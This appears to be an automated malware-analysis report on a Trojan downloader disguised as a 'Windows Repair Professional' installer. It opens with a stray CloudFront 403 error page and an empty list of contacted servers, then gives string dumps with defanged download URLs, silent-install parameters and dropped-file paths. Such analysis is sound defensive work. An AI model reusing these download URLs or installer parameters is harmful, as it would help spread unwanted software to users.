id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 13 Aug 2015 00:45:54 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 3abf650c7bf73e47515000bddf3f05c0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1616:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
ogram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
System.dll
callback%d
KERNEL32.DLL
COMDLG32.dll
IPHLPAPI.DLL
MPR.dll
OLEAUT32.dll
PSAPI.DLL
USERENV.dll
UxTheme.dll
WININET.dll
WINMM.dll
WSOCK32.dll
FtpOpenFileW
hXXp://VVV.usertrust.com1
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
hXXp://ocsp.usertrust.com0
hXXps://secure.comodo.net/CPS0C
2hXXp://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
2hXXp://crt.comodoca.com/COMODORSACodeSigningCA.crt0$
hXXp://ocsp.comodoca.com0
shane@tweaking.com0
"COMODO RSA Certification Authority0
;hXXp://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
/hXXp://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
nsd2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S
ram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201508130045
hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
Nullsoft Install System v2.46
%original file name%.exe_1616_rwx_10004000_00001000:
callback%d
NojM0TDHJX.exe_1980:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
_downloader-Q4gYjE1gv.exe
instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
UyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
%d/at
key=end
} .rdata
KERNEL32.DLL
nsArray.dll
Join
.reloc
System.dll
callback%d
@.reloc
ButtonEvent.dll
`.reloc
MsgWaitForMultipleObjects
BgWorker.dll
LangDLL.dll
W.vS|
Windows Repair Professional (A Setup
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
Fbu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
19458637
x.exe
staller.com/installer/?iid=324&nsoft=9
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
NojM0TDHJX.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
722076380
2107457
1393165021
1124729953
hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
iUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
0.x.exe
Q4gYjE1gv.exe
)-.Yln
Nullsoft Install System v2.46
1.1.1.6
1.0.0.8
NojM0TDHJX.exe_1980_rwx_003D4000_00001000:
callback%d
NojM0TDHJX.exe_1980_rwx_10001000_00007000:
/key=
.text
`.rdata
@.data
.rsrc
@.reloc
cpSetup.exe_568:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
%Program Files%
\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
$$\wininit.ini
@.reloc
subid1: %s
subid2: %s
subid3: %s
subid4: %s
subid5: %s
url1: %s
url2: %s
apptitle: %S
appimgurl: %s
appsetupurl: %s
appcmd: %s
apptyurl: %s
appversion: %s
Offer path: %s
Offer retruned: %s
hXXp://
Stub.dll
GetProcessHeap
nsx8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe
:::#222.111 )))
Nullsoft Install System v2.46